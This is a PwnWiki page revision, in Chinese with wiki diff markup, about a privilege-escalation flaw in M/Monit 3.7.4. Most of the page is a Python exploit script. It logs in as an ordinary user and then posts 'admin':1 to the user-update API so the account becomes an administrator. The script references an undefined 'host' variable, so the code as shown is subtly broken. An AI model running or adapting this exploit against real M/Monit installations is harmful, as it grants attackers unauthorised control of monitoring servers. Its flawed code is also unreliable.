Difference between revisions of "M/Monit 3.7.4 權限提升漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Version : 3.7.4 </pre> ==EXP== <pre> import sys import requests url = 'http://your_ip_here:8080' username = 'te...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 09:48, 13 June 2021

Other languages:
Chinese • ‎中文(中国大陆)‎

影響版本

Version : 3.7.4

EXP

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(host)

def login():
  print('Attempting to login...')
  data = {
    'z_username':username,
    'z_password':password
  }
  headers = {
    'Content-Type':'application/x-www-form-urlencoded'
  }
  
  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
  if resp.ok:
    print('Logged in successfully.')
  else:
    print('Could not login.')
    sys.exit(1)

def privesc():
  data = {
    'uname':username,
    'fullname':username,
    'password':password,
    'admin':1
  }
  resp = sess.post(url + '/api/1/admin/users/update', data=data)
  
  if resp.ok:
    print('Escalated to administrator.')
  else:
    print('Unable to escalate to administrator.')
  
  return

if __name__ == '__main__':
  login()
  privesc()
Retrieved from "https://pwnwiki.com/index.php?title=M/Monit_3.7.4_權限提升漏洞&oldid=4986"